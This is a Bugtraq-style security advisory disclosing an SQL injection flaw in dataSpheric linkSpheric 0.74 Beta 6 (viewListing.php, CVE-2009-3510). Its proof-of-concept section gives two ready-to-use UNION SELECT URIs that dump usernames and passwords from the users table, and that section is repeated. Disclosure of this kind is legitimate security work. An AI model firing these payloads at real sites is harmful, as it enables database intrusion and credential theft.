dataSpheric linkSpheric 'viewListing.php' SQL Injection Vulnerability
BID:43304
Info
dataSpheric linkSpheric 'viewListing.php' SQL Injection Vulnerability
| Bugtraq ID: | 43304 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-3510 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2009 12:00AM |
| Updated: | Jul 30 2009 12:00AM |
| Credit: | NoGe |
| Vulnerable: |
dataSpheric linkSpheric 0.74 Beta 6 |
| Not Vulnerable: | |
Discussion
dataSpheric linkSpheric 'viewListing.php' SQL Injection Vulnerability
dataSpheric linkSpheric is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
dataSpheric linkSpheric 0.74 Beta 6 is vulnerable; other versions may also be affected.
dataSpheric linkSpheric is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
dataSpheric linkSpheric 0.74 Beta 6 is vulnerable; other versions may also be affected.
Exploit / POC
dataSpheric linkSpheric 'viewListing.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://www.example.com/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://www.example.com/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--